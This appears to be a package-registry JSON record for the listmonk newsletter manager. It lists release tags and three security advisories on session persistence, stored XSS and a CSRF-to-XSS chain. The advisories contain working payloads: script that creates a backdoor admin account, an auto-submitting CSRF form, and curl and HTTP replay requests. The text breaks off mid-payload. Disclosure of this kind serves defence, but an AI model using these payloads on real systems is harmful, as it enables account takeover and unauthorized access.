v0.6.2-alpha","sha":"82702ed5bc64c4cbc567b561f187bc3f8abe83b5","kind":"commit","published_at":"2020-05-25T06:25:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha/manifests"},{"name":"v0.6.1-alpha","sha":"18329ff052e62e74b9114d4e2126074c9845277b","kind":"commit","published_at":"2020-05-17T15:37:48.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha/manifests"},{"name":"v0.6.0-alpha","sha":"cb331b93418eecaffdfcdcc38c91606328afdf47","kind":"commit","published_at":"2020-05-16T18:09:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha/manifests"},{"name":"v0.5.2-alpha","sha":"b8d9ab10f29d8fc3c3dc0fcfb235ce453d8c58bf","kind":"commit","published_at":"2020-04-02T12:52:56.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha/manifests"},{"name":"v0.5.1-alpha","sha":"21ffe5fb02256a6e391b5e2ebe11554badee5ee5","kind":"commit","published_at":"2020-04-01T14:29:41.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha/manifests"},{"name":"v0.5.0-alpha","sha":"ad9ee7528d34ce19659a7aa963ada18baebddb0b","kind":"commit","published_at":"2020-03-08T10:40:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha/manifests"},{"name":"v0.4.0-alpha","sha":"62aa31b14cf651084a76aba0021106fd78911081","kind":"commit","published_at":"2020-02-09T13:45:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.4.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.4.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.4.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha/manifests"},{"name":"v0.3.3-alpha","sha":"9a88c2ed7b69bf020ccc95625788017f214a29c3","kind":"commit","published_at":"2020-02-06T10:09:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.3-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.3-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.3-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha/manifests"},{"name":"v0.3.2-alpha","sha":"047de697707e4a3ea23b53c7a1917f20edc9f8c2","kind":"commit","published_at":"2020-02-05T12:39:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha/manifests"},{"name":"v0.3.1-alpha","sha":"1064f1e4d8b1ef8d083f02254900b42c442e6e92","kind":"commit","published_at":"2020-01-19T15:19:01.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha/manifests"},{"name":"v0.3.0-alpha","sha":"ccd354df3f85259a0b88dffe4a51586aab01135b","kind":"commit","published_at":"2019-10-31T06:31:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha/manifests"},{"name":"v0.2.2-alpha","sha":"d8d7f88af357823778f468ee50deef0b49f0cd77","kind":"commit","published_at":"2019-09-10T07:26:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha/manifests"},{"name":"v0.2.1-alpha","sha":"649d1b11f0d4d0c353f9682656514056d4e7d769","kind":"tag","published_at":"2019-08-26T18:16:32.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha/manifests"},{"name":"v0.2.0-alpha","sha":"b63b31ec52f52e48b6b456134857c737340f29f6","kind":"commit","published_at":"2019-07-21T16:42:54.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha/manifests"},{"name":"v0.1.2-alpha","sha":"275554e57e31d5bf4505e06101e1c69ef91293ed","kind":"commit","published_at":"2019-07-12T11:49:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha/manifests"},{"name":"v0.1.1-alpha","sha":"3d3af8c429bd4f0d4936115e9becd45d3a6b77c0","kind":"commit","published_at":"2019-07-12T10:18:29.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha/manifests"},{"name":"v0.1.0-alpha","sha":"9fd9748d4d02f708d311ddf7d6d3b308b575e24b","kind":"commit","published_at":"2019-07-09T11:36:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha/manifests"}]},"repo_metadata_updated_at":"2026-08-29T13:40:04.705Z","dependent_packages_count":1,"downloads":null,"downloads_period":null,"dependent_repos_count":1,"rankings":{"downloads":null,"dependent_repos_count":4.726210113019375,"dependent_packages_count":5.812310473583048,"stargazers_count":0.6406569113382143,"forks_count":0.9664469346074986,"docker_downloads_count":1.5605079863891314,"average":2.7412264837874534},"purl":"pkg:golang/github.com/knadh/listmonk","advisories":[{"uuid":"GSA_kwCzR0hTQS1oNWo5LWN2cnctdjVxaM4ABUmU","url":"https://github.com/advisories/GHSA-h5j9-cvrw-v5qh","title":"listmonk's active sessions remain valid after password reset and password change","description":"### Summary\nA session management vulnerability allows previously issued authenticated sessions to remain valid after sensitive account security changes, specifically password reset and password change. As a result, an attacker who has already obtained a valid session cookie can retain access to the account even after the victim changes or resets their password.\n\nThis weakens account recovery and session security guarantees. I reproduced the issue on listmonk v6.0.0.\n\n### Details\nThe application updates account credentials successfully, but existing active sessions are not revoked afterward.\n\nThis behavior was confirmed in two flows:\n\n1. **Password reset flow**\n   - A user resets their password through the forgot/reset flow.\n   - The old password becomes invalid.\n   - The new password works.\n   - However, a session cookie issued **before** the reset remains valid and continues to authenticate successfully.\n\n2. **Authenticated password change flow**\n   - The same user logs in from two separate sessions.\n   - Using session A, the password is changed through the authenticated profile endpoint.\n   - The old password becomes invalid.\n   - The new password works.\n   - However, session B, issued before the password change, remains valid and continues to authenticate successfully.\n\nFrom the source review, the reset flow consumes the reset token, updates the password, and creates a fresh session, but there does not appear to be any revocation of older sessions. The same applies to the profile password change flow.\n\nRelevant code areas observed during review:\n- `cmd/auth.go` — forgot/reset flow\n- `cmd/users.go` — authenticated profile update flow\n- `internal/core/users.go` — password update path\n\nAdditionally:\n- It was verified that reset links are single-use.\n- It was verified that password reset on a TOTP-enabled account still enforces TOTP on fresh login.\n- However, already-issued sessions still remain valid after reset.\n\n### PoC\n#### Case 1: Password reset does not revoke existing session\n\n1. Create or use a normal user account.\n2. Log in as that user and save the authenticated session cookie.\n3. Trigger forgot-password for the account.\n4. Use the emailed reset link and set a new password.\n5. Verify:\n   - the old password no longer works\n   - the new password works\n6. Replay the **old pre-reset session cookie** against an authenticated endpoint such as `/api/profile`.\n\nExample validation request:\n```http\nGET /api/profile HTTP/1.1\nHost: 127.0.0.1:9000\nCookie: session=\u003cold_pre_reset_session\u003e\n```\n\nObserved result:\n\nServer returns `HTTP/1.1 200 OK`\nResponse contains the authenticated user profile\n\n#### Case 2: Password change does not revoke other active sessions\n\n1. Log in twice as the same user and save two authenticated session cookies:\n   - session A\n   - session B\n\n2. Using session A, change the password through the authenticated profile update endpoint.\n\n3. Verify:\n   - the old password no longer works\n   - the new password works\n\n4. Replay session B against an authenticated endpoint such as `/api/profile`.\n\nExample password change request:\n```http\nPUT /api/profile HTTP/1.1\nHost: 127.0.0.1:9000\nCookie: session=\u003csession_A\u003e\nContent-Type: application/json\n\n{\n  \"name\":\"victim1\",\n  \"email\":\"victim1@test.local\",\n  \"password\":\"VictimChanged123\"\n}\n```\n\nThen validate session B:\n```http\nGET /api/profile HTTP/1.1\nHost: 127.0.0.1:9000\nCookie: session=\u003csession_B\u003e\n```\n\nObserved result:\n- Server returns `HTTP/1.1 200 OK`\n- Response contains the authenticated user profile\n\n## Impact\n\nThis issue allows persistence of unauthorized access after credential recovery actions.\n\nIf an attacker has already stolen a valid session cookie through any means (for example malware, browser compromise, XSS, shared machine access, proxy leakage, or other session theft), the victim cannot fully recover the account by changing or resetting the password alone. The attacker’s existing session remains valid.\n\nThis impacts account recovery expectations and session security for all authenticated users, including users with TOTP enabled.\n\n## Attachment\n[listmonk-session-report.zip](https://github.com/user-attachments/files/25975979/listmonk-session-report.zip)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-04-01T23:48:43.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N","references":["https://github.com/knadh/listmonk/security/advisories/GHSA-h5j9-cvrw-v5qh","https://nvd.nist.gov/vuln/detail/CVE-2026-34828","https://github.com/knadh/listmonk/commit/db82035d619348949512dafdaf60c86037cafc9e","https://github.com/knadh/listmonk/releases/tag/v6.1.0","https://github.com/advisories/GHSA-h5j9-cvrw-v5qh"],"source_kind":"github","identifiers":["GHSA-h5j9-cvrw-v5qh","CVE-2026-34828"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-02T00:00:09.167Z","updated_at":"2026-08-28T13:03:09.335Z","epss_percentage":0.003,"epss_percentile":0.22028,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oNWo5LWN2cnctdjVxaM4ABUmU","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oNWo5LWN2cnctdjVxaM4ABUmU","packages":[{"ecosystem":"go","package_name":"github.com/knadh/listmonk","versions":[{"first_patched_version":"1.1.1-0.20260329113754-1b5e8d38c778","vulnerable_version_range":"\u003e= 1.1.1-0.20241028090858-319053dd7a90, \u003c 1.1.1-0.20260329113754-1b5e8d38c778"}],"purl":"pkg:go/github.com%2Fknadh%2Flistmonk"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oNWo5LWN2cnctdjVxaM4ABUmU/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qbXI0LXA1NzYtdjU2Nc4ABQqR","url":"https://github.com/advisories/GHSA-jmr4-p576-v565","title":"listmonk Vulnerable to Stored XSS Leading to Admin Account Takeover","description":"## Security Advisory: Stored XSS Leading to Admin Account Takeover\n\n**Affected Versions:** ≤ 5.1.0  \n**Vulnerability Type:** CWE-79: Stored Cross-Site Scripting  \n\n---\n\n## Summary\n\nA lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts.\n\nThe attack can be weaponized via the **public archive feature**, where victims simply need to visit a link - no preview click required.\n\n---\n\n## Required Attacker Permissions\n\n```\ncampaigns:manage    - Create/edit campaigns\ncampaigns:get       - View campaigns  \nlists:get_all       - Access lists\ntemplates:get       - Access templates\n```\n\n**Note:** These are common permissions for content managers who are not full admins.\n\n---\n\n## Attack Vectors\n\n### Vector 1: Raw HTML (Direct Script Tag)\n\n```html\n\u003cscript\u003e\nfetch('/api/users', {\n  method: 'POST',\n  headers: {'Content-Type': 'application/json'},\n  credentials: 'include',\n  body: '{\"username\":\"backdoor\",\"email\":\"backdoor@evil.com\",\"name\":\"Backdoor\",\"password\":\"Hacked123\",\"type\":\"user\",\"status\":\"enabled\",\"userRoleId\":1,\"user_role_id\":1}'\n});\n\u003c/script\u003e\n```\n\n### Vector 2: Go Template `Safe` Function\n\n```\n{{ `\u003cscript\u003efetch('/api/users',{method:'POST',headers:{'Content-Type':'application/json'},credentials:'include',body:'{\"username\":\"backdoor\",\"email\":\"backdoor@evil.com\",\"name\":\"Backdoor\",\"password\":\"Hacked123\",\"type\":\"user\",\"status\":\"enabled\",\"userRoleId\":1,\"user_role_id\":1}'});\u003c/script\u003e` | Safe }}\n```\n\n---\n\n## Attack Scenarios\n\n### Scenario 1: Campaign Preview Attack\n\n1. Attacker creates campaign with XSS payload\n2. Request is made to super admin: *\"Please review my newsletter draft\"*\n3. Super admin opens campaign and clicks **Preview**\n4. XSS executes → Backdoor admin account created\n5. Attacker logs in with `backdoor` / `Hacked123`\n\n### Scenario 2: Archive Link Attack (No Click Required)\n\n1. Attacker creates campaign with XSS payload\n2. Attacker enables **Archive** for the campaign\n3. Attacker shares archive link: `http://localhost:9000/archive/{uuid}`\n4. Super admin visits the link (no preview click needed!)\n5. XSS executes automatically → Account takeover\n\n---\n\n## Proof of Concept\n\n### Step 1: Create Malicious Campaign\n\nAs lower-privileged user, create campaign with body:\n```html\n\u003cscript\u003e\nfetch('/api/users', {\n  method: 'POST',\n  headers: {'Content-Type': 'application/json'},\n  credentials: 'include',\n  body: JSON.stringify({\n    username: 'backdoor',\n    email: 'backdoor@evil.com', \n    name: 'Backdoor Admin',\n    password: 'Hacked123',\n    type: 'user',\n    status: 'enabled',\n    userRoleId: 1,\n    user_role_id: 1\n  })\n});\n\u003c/script\u003e\n```\n\n### Step 2: Enable Archive (Optional - for link-based attack)\n\n1. Edit campaign settings\n2. Enable \"Archive\"\n3. Copy archive URL: `http://localhost:9000/archive/{campaign-uuid}`\n\n### Step 3: Trigger Execution\n\n**Option A - Preview:**\n- Send campaign to super admin for \"review\"\n- Super admin previews → XSS fires\n\n**Option B - Archive Link:**\n- Share archive URL with super admin\n- Super admin visits link → XSS fires automatically\n\n### Step 4: Verify Takeover\n\n```bash\n# Login as backdoor admin\ncurl -X POST \"http://localhost:9000/admin/login\" \\\n  -d \"username=backdoor\u0026password=Hacked123\" \\\n  -c cookies.txt -L\n\n# Verify super admin access\ncurl -b cookies.txt \"http://localhost:9000/api/users\"\n```\n\n---\n\n## Evidence Screenshots\n\n\u003e **[Screenshot 1: Lower-privileged user creating malicious campaign]**\n\u003cimg width=\"1892\" height=\"781\" alt=\"Screenshot 2025-12-27 170259\" src=\"https://github.com/user-attachments/assets/b9af26bf-0c5b-4667-ba9a-eea774156d0b\" /\u003e\n\n\u003e **[Screenshot 2: Super admin previewing campaign]**\n\u003cimg width=\"1686\" height=\"709\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4ca3d5ff-0cd9-4f22-bca0-e26e13c6b1c7\" /\u003e\n\n\u003e **[Screenshot 3: Backdoor user successfully created]**\n\u003cimg width=\"1370\" height=\"469\" alt=\"Screenshot 2025-12-27 170413\" src=\"https://github.com/user-attachments/assets/18135128-f5af-4023-9aa7-8662a1405ed2\" /\u003e\n\n---\n\n## Impact\n\n| Action | Possible via XSS |\n|--------|-----------------|\n| Create backdoor admin | ✅ Yes |\n| Export all subscribers | ✅ Yes |\n| Modify SMTP settings | ✅ Yes |\n| Delete all campaigns | ✅ Yes |\n| Access API keys/secrets | ✅ Yes |\n\n---\n\n## Affected Components\n\n| Component | XSS Works? | Method |\n|-----------|-----------|--------|\n| Campaign body (Raw HTML) | ✅ Yes | Direct `\u003cscript\u003e` tag |\n| Campaign body (Template) | ✅ Yes | `{{ \\` \\` \\| Safe }}` |\n| Template body | ✅ Yes | Both methods |\n| Campaign archive | ✅ Yes | Automatic execution on visit |\n\n---","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-01-02T23:04:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P","references":["https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565","https://nvd.nist.gov/vuln/detail/CVE-2026-21483","https://github.com/knadh/listmonk/commit/74dc5a01cfbb12cf218cb33ddad8410c53e2e915","https://github.com/knadh/listmonk/releases/tag/v6.0.0","https://github.com/advisories/GHSA-jmr4-p576-v565"],"source_kind":"github","identifiers":["GHSA-jmr4-p576-v565","CVE-2026-21483"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-03T00:00:08.940Z","updated_at":"2026-09-01T18:04:45.171Z","epss_percentage":0.00229,"epss_percentile":0.13529,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qbXI0LXA1NzYtdjU2Nc4ABQqR","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qbXI0LXA1NzYtdjU2Nc4ABQqR","packages":[{"ecosystem":"go","package_name":"github.com/knadh/listmonk","versions":[{"first_patched_version":"1.1.1-0.20251231125615-74dc5a01cfbb","vulnerable_version_range":"\u003c 1.1.1-0.20251231125615-74dc5a01cfbb"},{"first_patched_version":"6.0.0","vulnerable_version_range":"\u003e= 1.1.1, \u003c 6.0.0"}],"purl":"pkg:go/github.com%2Fknadh%2Flistmonk"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qbXI0LXA1NzYtdjU2Nc4ABQqR/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yZjI0LXdnNzctZ3E3d84ABL5J","url":"https://github.com/advisories/GHSA-rf24-wg77-gq7w","title":"listmonk: CSRF to XSS Chain can Lead to Admin Account Takeover","description":"### Summary\n\nCross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.\n\n\n### Details\n\nDuring a security evaluation of the webapp, every http request in addition to the session cookie `session` there included `nonce`. The value is not checked and validated by the backend, removing `nonce` allows the requests to be processed correctly.\n\nThis may seem harmless, but if chained to other vulnerabilities it can become a critical vulnerability.\n\nExample HTTP request without nonce : \n\u003cimg width=\"1418\" height=\"772\" alt=\"user_creation_without_nonce_burp_request\" src=\"https://github.com/user-attachments/assets/a5026cdd-d360-4919-ae66-29856c3d3f32\" /\u003e\n\n\n\n### PoC\n\nLet's look at a “chain” case of vulnerabilities that include the CSRF and XSS.\n\nAn admin (or any user with permissions) can create templates and preview them (`POST /api/templates/preview` ) making it possible to execute javascript code. For example:\n\n\u003cimg width=\"1912\" height=\"935\" alt=\"browser_template_editor_with_alert\" src=\"https://github.com/user-attachments/assets/a928a4bd-1e5f-4fbe-af08-196362e271ad\" /\u003e\n\nAnd this request can also be made without `nonce`.\n\n\u003cimg width=\"1883\" height=\"707\" alt=\"template_preview_burp_request_without_nonce\" src=\"https://github.com/user-attachments/assets/202c6a39-b62f-48c1-becb-688c3325dc41\" /\u003e\n\nThen an attacker can exploit this lack of validation to trigger an XSS in the victim's browser (let's assume the admin).\n\nThis is possible for 2 reasons :\n 1) There is no validation of the `nonce` (as mentioned above)\n 2) The `session` cookie has no samesite flag\n\n\u003cimg width=\"1557\" height=\"593\" alt=\"no_same_site_response_cookie_burp\" src=\"https://github.com/user-attachments/assets/c3fab6ac-5068-44cd-850a-bd095c10cb77\" /\u003e\n\nAs we can see from the image above, no samesite cookie policy is set during login, so the browser will use the default one.\nSome browsers by default set `Lax` (Chrome), but many others use `None` (Firefox, Edge).\n\nFor example, we can host this html page to prompt the admin to make a post request\n\n```html\n\u003chtml\u003e\n  \u003c!-- CSRF PoC  --\u003e\n  \u003cbody\u003e\n    \u003cform action=\"https://10.100.132.47/api/templates/preview\" method=\"POST\"\u003e\n      \u003cinput type=\"hidden\" name=\"template\u0026#95;type\" value=\"campaign\" /\u003e\n      \u003cinput type=\"hidden\" name=\"body\" value=\"\u0026#123;\u0026#123;\u0026#32;template\u0026#32;\u0026quot;content\u0026quot;\u0026#32;\u0026#46;\u0026#32;\u0026#125;\u0026#125;\u0026#13;\u0026#10;\u0026#13;\u0026#10;\u0026lt;script\u0026gt;alert\u0026#40;\u0026#41;\u0026lt;\u0026#47;script\u0026gt;\" /\u003e\n      \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n    \u003c/form\u003e\n    \u003cscript\u003e\n      document.forms[0].submit();\n    \u003c/script\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n\n\n```\n\n\n\nThe CSRF+XSS PoC written above has been tested on 3 browsers (using their latest versions)\n- Chrome ❌\n- Firefox ✅\n- Edge ✅\n\nExample in Firefox : \n\n![xss_mozilla_poc](https://github.com/user-attachments/assets/04397e79-0fa1-4c99-b8c2-5b2ff2fbf4fa)\n\nWe can now replace the simple `alert()` with any “harmful” request. For example, the creation of a new admin account:\n\u003cimg width=\"1226\" height=\"925\" alt=\"browser_template_editor_with_final_payload\" src=\"https://github.com/user-attachments/assets/a5a79c50-45f4-4a9c-80a5-683803349d1a\" /\u003e\n\n```html\n    \u003cscript\u003e\n      function submitRequest()\n      {\n        var xhr = new XMLHttpRequest();\n        xhr.open(\"POST\", \"https:\\/\\/10.100.132.47\\/api\\/users\", true);\n        xhr.setRequestHeader(\"Content-Type\", \"application\\/json\");\n        xhr.withCredentials = true;\n        var body = \"{\\\"username\\\":\\\"testuser4\\\",\\\"email\\\":\\\"test3@test.com\\\",\\\"name\\\":\\\"testuser4\\\",\\\"password\\\":\\\"Test12345\\\",\\\"passwordLogin\\\":true,\\\"type\\\":\\\"user\\\",\\\"status\\\":\\\"enabled\\\",\\\"listRoleId\\\":\\\"\\\",\\\"userRoleId\\\":1,\\\"password2\\\":\\\"Test12345\\\",\\\"password_login\\\":true,\\\"user_role_id\\\":1,\\\"list_role_id\\\":null}\";\n        var aBody = new Uint8Array(body.length);\n        for (var i = 0; i \u003c aBody.length; i++)\n          aBody[i] = body.charCodeAt(i); \n        xhr.send(new Blob([aBody]));\n      }\n      submitRequest();\n    \u003c/script\u003e\n```\n\nThe final poc that exploits CSRF + XSS,  allowing admin account creation:\n\n```html\n\n\u003chtml\u003e\n  \u003c!-- CSRF PoC --\u003e\n  \u003cbody\u003e\n    \u003cform action=\"https://10.100.132.47/api/templates/preview\" method=\"POST\"\u003e\n      \u003cinput type=\"hidden\" name=\"template\u0026#95;type\" value=\"campaign\" /\u003e\n      \u003cinput type=\"hidden\" name=\"body\" 